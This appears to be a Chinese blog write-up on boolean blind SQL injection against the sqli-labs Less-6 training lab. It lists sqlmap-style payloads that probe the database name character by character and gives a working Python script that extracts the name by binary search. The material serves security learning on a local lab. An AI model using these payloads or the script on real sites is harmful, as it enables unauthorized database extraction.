布尔盲注脚本-sqlilabs-less6

 写这个起因是用sqlmap跑完，从日志里看它payload想自己复现一下。

不过sqlmap好像并没有识别数据库名的长度，而是直接从第一位开始判断。也可能它payload混在了前面识别类型的里面我没注意。判断库名的部分payload如下

ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>120#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>116#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>114#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>115#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>104#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>100#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>102#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),2,1))>101#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>64#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>96#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>112#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>104#
ID:1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>100#

大意是将database()转换为char类型，判断是否为空，非空的话就截取第x位。利用大于号判断其ASCII码值的区间来确定最终值。

如果大于，即and条件为真 页面显示正常，会有一行黄字You are in...........

我自己的脚本思路是，先判断数据库名长度，再利用二分法读取库名。哈哈说是复现，跟sqlmap不一样。懒惰，不想翻源码了

import requests
def getlength():
    i=1
    while(i<10):
        url = 'http://127.0.0.1/sqli-labs-master/Less-6/?id=1" and (select length(database()))={} --+'
        url=url.format(i)
        r = requests.get(url)
        if("You are in..........." in r.text):
            return i
        i += 1        

if __name__ == "__main__":
    u = 'http://127.0.0.1/sqli-labs-master/Less-6/?id='
    #chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    payload = '1" AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),{},1))>{}--+'
    n=getlength()
    databasename=''
    for i in range(1,n+1):
        min_ascii = 65
        max_ascii = 122
        while(abs(max_ascii-min_ascii)>1):
            mid = (max_ascii + min_ascii)//2
            url = u + payload
            url = url.format(i,mid)
            r = requests.get(url)
            if("You are in..........." in r.text):
                min_ascii = mid 
            else:
                max_ascii = mid 
        databasename += chr(max_ascii)
    print(databasename)